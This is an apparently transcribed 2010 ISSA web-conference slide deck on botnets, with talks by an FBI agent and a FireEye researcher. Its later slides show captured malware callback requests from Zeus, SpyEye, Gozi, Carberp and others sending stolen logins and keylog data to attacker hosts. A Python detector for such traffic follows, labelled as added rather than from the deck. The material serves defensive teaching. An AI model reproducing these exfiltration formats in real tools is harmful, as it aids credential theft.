
Botnets

ISSA Web Conference

Sponsored by:

October 26, 2010 Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London

Welcome: Conference Moderator

Phillip H Griffin
Member - ISSA Educational Advisory Council, Web Conferences Committee

Agenda
How Botnets Have Evolved
Chris Calderon - Special Agent, FBI

Rooting Out the Bad Actors


Alex Lanstein - Systems Consulting Engineer, FireEye

Joint Speaker Question & Answer

Closing Comments

UNCLASSIFIED

How Botnets Have Evolved


presented by Special Agent Chris Calderon, FBI


Agenda
What is a botnet?
How are botnets created?
Why are botnets created?
Basic structure of a botnet
Taking down a botnet
How botnets are evolving
Botnets in the news
Questions


What is a botnet?
A network of compromised computers (robots/bots)
Controlled by a bot master / herder
Used to carry out various illegal activities
Services are often sold to other criminal elements


How are botnets created?

Setup
  Obtain reliable infrastructure
  Develop malware and C&C software

Victims
  Malware loaded onto victim machines
  Done through exploits and/or social engineering

Manage
  Continually update software / instructions to bots
  Maintain statistics for the botnet

Why are botnets created?

Spam
Distributed Denial of Service (DDoS)
Click Fraud
Fake Anti-Virus
Credential Theft
Proxy Service
Cyber Warfare

Basic Structure

[Diagram: Bot Master / Herder -> C&C Servers -> Victims]

Taking down a botnet

[Diagram: Bot Master / Herder -> C&C Servers -> Victims]

Botnets evolving

[Diagram: Bot Master / Herder -> C&C Servers -> Proxies -> Victims]

Botnets evolving

[Diagram: Bot Master / Herder -> Proxies -> C&C Servers -> Proxies -> Victims]

Botnets in the news


ZEUS
Steals and logs online banking credentials
Primarily targets high-balance accounts
Money mules used to get money to bad actors
Kit now used by many different groups
Estimated $70,000,000 stolen from US banks

Botnets in the news


MARIPOSA (BUTTERFLY)
Steals online credentials, and also used in DDoS attacks
Estimated 12 million infected computers
Bad actors traced to Spain and arrested
Criminal proceedings ongoing

Botnets in the news


SPAM BOTS
Conficker, Cutwail, Waledac, ...
Up to 10 million bots per botnet
Each botnet can send billions of spam emails per day
Spam used to distribute malware, drive online pharmaceutical sales, fake antivirus software, pay-per-click advertising, ...

Questions?


Rooting out the Bad Actors


or: p2p, fast flux, and other botnet myths

Alex Lanstein, Senior Security Researcher, FireEye, Inc.

Today's Agenda

Understanding the shift from conventional to modern malware, and the resultant hosting needs

A few TT&P to uncover older or moderately sophisticated malware

A detailed look at a few bots in the news

Conventional vs. Modern, APT Malware


Conventional Malware
Characterized by using spreading techniques, custom C&C transport protocols, IRC communication
Examples: Malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots

Detectable through a variety of technologies/tactics:
NetWitness/Solera, enVision/ArcSight/Splunk, NIDS
Port scanning, high Windows port activity, non-HTTP over port 80, non-web traffic, etc.

Conventional vs. Modern Malware


Modern-ish malware:
Characterized by infecting via browser-based exploits
Exploit channel: PDF, Flash, IE/Firefox, QuickTime, ...
C&C callback over HTTP(S)
Malware: ZeuS, Gozi, Koobface, Rustock, SpyEye
Partially detectable through manual traffic analysis fairly easily, but a full-time resource is needed

World's Top Malware

Source: FireEye Malware Intelligence Lab


Modern Malware Infection Lifecycle

1. System gets exploited
   Drive-by attacks in casual browsing
   Links in targeted emails
   Socially engineered binaries
   Compromised web server, or Web 2.0 site

2. Dropper malware installs
   First step to establish control
   Calls back out to criminal servers (callback server)
   Found on compromised sites, and Web 2.0, user-created content sites

3. Malicious data theft & long-term control established
   Uploads data stolen via keyloggers, Trojans, bots, & file grabbers
   One exploit leads to dozens of infections on same system
   Criminals have built long-term control mechanisms into system

Defenses shown in the diagram:
   Perimeter security (signature, rule-based)
   Other gateway
   Desktop antivirus (list-based, signatures): losing the threat arms race

Where is all this malware being hosted?

Previously we used to see malware being hosted on infected home machines
Web filters responded by blocking access to domains that had multiple A records in residential IP space
Now it's being hosted on dedicated servers in proper data centers. Sometimes even with their own RIR-registered IP space!

Root of the Problem


There is no Internet Police!

Who controls the Internet? ICANN? IANA? CERTs? USCYBERCOM? Tier 1 ISPs?
Depends who you ask and how big a stink you make.


How the Internet is delegated


In the name space (think DNS):
ICANN -> Registries
Registries == Verisign, Afilias, ccTLD operators
Registries sell to certified gTLD and regional registrars
Registrars == namecheap.com, godaddy.com, netsol.com
Registrars sell to registrants (end user)

How the Internet is delegated


In the IP space:
ICANN/IANA (Internet Assigned Numbers Authority)
IANA -> RIRs
RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC
RIRs -> LIRs
LIRs are generally data centers and ISPs

ICANN't do anything!
ICANN and the RIRs simply sign contracts. They have no regulatory authority whatsoever, presuming that the registrar doesn't violate the contract. These contracts have no mention of content.

Recent success against EstDomains was due to them having a convicted felon as an Officer of the company.
Large pushback when someone even suspects they are trying to take an authoritative stance on something.


Big bots in 2010

Rustock: still sticking around

POST /index.php?topic=33.117 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://go-thailand-now.com/
Content-Type: application/x-www-form-urlencoded
Content-Encoding: gzip
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: go-thailand-now.com
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache

Gozi

POST /cgi-bin/forms.cgi HTTP/1.0
Content-Type: multipart/form-data; boundary=-------------------------139b9b3139b9b3139b9b3
User-Agent: IE
Host: 91.216.215.130
Content-Length: 453
Pragma: no-cache

----------------------------139b9b3139b9b3139b9b3
Content-Disposition: form-data; name="upload_file"; filename="3759777034.21"
Content-Type: application/octet-stream

URL: https://mail.google.com/mail/channel/bind?VER=8&at=KLJASDF133234901 FhI &it=1121&SID=6JK1290NR3A3&RID=4611&AID=95&= mousemove
----------------------------139b9b3139b9b3139b9b3--

Zeus

POST /xed/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF)
Host: schastlivieiveselierebyta0001.com
Content-Length: 329
Connection: Keep-Alive
Cache-Control: no-cache

. ....4...A..2.`.Ul...T.......(....4pP.u.x.!.D.!.+.......q.. '7.........7.....D.0..Y...$.......[(...F...c.|e.y...g.b..t.x.........mn.....@....We...jN>.s..j=. ..rY?.-8.c Ss.Gt'.a. ...cU./. .e(....QB.D.S..N0>.5.....I.`:........".....;5..U. .t....!......f.=E.<?S..J..J...&.U4...Ju.'9F..E..A.{../.X.cY.}..9..?_...$#>....0Y,.. ..".<.



Tigger: Not just financials anymore

POST /track_c.cgi HTTP/1.0
Content-Length: 81

icin.wembh.rjr...{|.JST]....wSJAUQFN.mST^AJS.bj.i_HUUY_.j[YQ. .J.J.. ...L . SANDBOX_QEZA1290412412;append;20;Microsoft Windows XP Service Pack 3;post_log;16639;force;[[[URL: https://internal.fireeye.com/login Title: <untitled> Process: C:\Program Files\Internet Explorer\iexplore.exe User-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)]]] {{{_b=sandbox&_k=mypass55%23&_r=0&timezone=420&timezoneFeb=420&timezoneOct=420&clientTime=removed&awr=1&isLoginForm=1&awsnf=_5&awsn=_u&awfid=true&awcharset=UTF-8&KEYLOG=s}}}

SpyEye: ZeuS replacement?

GET /web/map/gate.php?guid=users1!AJKLPQ!JU1232&ver=10280&stat=ONLINE&plg=ftpbc;socks5;t2p&cpu=0&ccrc=JKLAF24&md5=9012ab902413dcf8gga89 HTTP/1.0
User-Agent: Microsoft Internet Explorer
Host: hahsdhsl.com
Pragma: no-cache

GET /maincp/gate.php?guid=user2!ND93103!893CND1&ver=10280&stat=ONLINE&cpu=0&ccrc=A91024N&md5=3fabd889712214bdbee8381337 HTTP/1.0
User-Agent: Microsoft Internet Explorer
Host: www.promohru.in
Pragma: no-cache

Carberp: Yet Another Datastealer

POST /recv.php HTTP/1.1
Host: 194.54.80.146
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 331

uid=MYWITCH099ABE891209141FGA91AFD&brw=2&type=1&data=https%3A%2F%2Fwww%2Estarwoodhotels%2Ecom%2Fpreferredguest%2Faccount%2Fsign%5Fin%2Ehtml%3F%7CPOST%3AsuccessPath%3Dhttps%253A%252F%252Fwww%2Estarwoodhotels%2Ecom%252Fpreferredguest%252Findex%2Ehtml%26login%3DALEXLANSTEIN%2540GMAIL%2ECOM%26persist%3Dtrue%26password%3Dmypassword

TDSS: Full on SSL

19:11:56.590979 IP 194.28.113.21.443 > 192.168.2.44.54528: tcp 620
....E ...1@.0.....q.... ....J[z7l.:........................J...F..L...N.]...xmvF..(..l...?},,nc{. .ygs.R...._........8.a#9cU....I..5................0...0..j. ...yV.9.x0 . *.H.. .....0E1.0 ..U....AU1.0...USome-State1!0...U...Internet Widgits Pty Ltd0.. 100114192303Z. 110114192303Z0E1.0 .U....AU1.0...USome-State1!0...U...Internet Widgits Pty Ltd0..0 . *.H.. .........0.......|.<..7...dt..IF0.~...;-..m.>.~Ra!f....O.Q....V...7q@..M....]P.*.....W.C...N5.(...Ux.z.._....W...b....*.P....AX.....(.......E.....0 . *.H.. .........@..p.Iru...Q.$K)..EF;....u.X......<... .;}....aa~>r.l.\......[.r.0@......%....S`...p.... .=3;..E.@...eq8OMw^7......"Zw..5.)g..........
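The traits visible in the captures on the preceding slides can be turned into a simple defensive check. The Python below is an added example, not code from the deck or from FireEye: it parses raw HTTP requests and reports which callback traits the slides show (gate-script paths, check-in query parameters, stub User-Agents, gzip-encoded request bodies, undeclared binary POST bodies). Host names and values in the sample requests are constructed, and the SSL-wrapped TDSS traffic is out of its reach.

```python
import re

# Added example (not from the ISSA deck or FireEye): traits taken from the
# callbacks shown on the slides; sample requests and host names are constructed.

GATE_RE = re.compile(r"/(gate|recv)\.php(\?|$)")       # Zeus, SpyEye, Carberp gate scripts
BEACON_PARAMS = {"guid", "ver", "stat", "md5", "uid"}  # SpyEye / Carberp check-in fields
STUB_AGENTS = {"ie", "microsoft internet explorer"}    # Gozi and SpyEye User-Agents

def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def callback_reasons(raw: bytes) -> list[str]:
    """Return the bot-callback traits a request shows; empty for plain browsing."""
    method, path, headers, body = parse_request(raw)
    reasons = []
    if GATE_RE.search(path):
        reasons.append("gate-script path")
    query = path.partition("?")[2]
    params = {p.split("=", 1)[0] for p in query.split("&") if p}
    if len(params & BEACON_PARAMS) >= 2:
        reasons.append("check-in parameters in query string")
    if headers.get("user-agent", "").lower() in STUB_AGENTS:
        reasons.append("stub User-Agent")
    if "gzip" in headers.get("content-encoding", ""):      # Rustock: browsers never
        reasons.append("gzip-encoded request body")        # gzip a request body
    ctype = headers.get("content-type", "")
    if (method == "POST" and "octet-stream" not in ctype and "multipart" not in ctype
            and any(b > 0x7e or b < 0x20 and b not in b"\r\n\t" for b in body)):
        reasons.append("undeclared binary POST body")      # Zeus: encrypted blob
    return reasons

# Constructed samples: a SpyEye-style check-in and an ordinary browser request.
BEACON = (b"GET /web/gate.php?guid=HOST1!ABC!123&ver=10280&stat=ONLINE&md5=0000 HTTP/1.0\r\n"
          b"User-Agent: Microsoft Internet Explorer\r\nHost: cc.example.invalid\r\n"
          b"Pragma: no-cache\r\n\r\n")
NORMAL = (b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nAccept: text/html\r\n"
          b"User-Agent: Mozilla/5.0 (Windows NT 6.1) Gecko/20100914 Firefox/3.6.10\r\n\r\n")

if __name__ == "__main__":
    for raw in (BEACON, NORMAL):
        print(raw.split(b"\r\n")[0].decode(), "->", callback_reasons(raw))
```

Each trait alone is weak (a stub User-Agent also comes from some legitimate download tools), so in practice the hits are combined and reviewed rather than blocked on sight.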

Thank you! Alex Lanstein alanstein@fireeye.com

www.fireeye.com
For late-breaking malware research and news:

blog.fireeye.com
FireEye, Inc. Confidential

Joint Speaker Question & Answer


Chris Calderon, Special Agent, FBI
Alex Lanstein, Systems Consulting Engineer, FireEye

Closing Remarks
Thank you to FireEye for their support of ISSA and this Web Conference

Thank you to Citrix for donating this Webcast service

Online Meetings Made Easy



CPE Credit
Within 24 hours of the conclusion of this webcast, you will receive a link to a post-Web Conference quiz.
After the successful completion of the quiz you will be given an opportunity to PRINT a certificate of attendance to use for the submission of CPE credits.
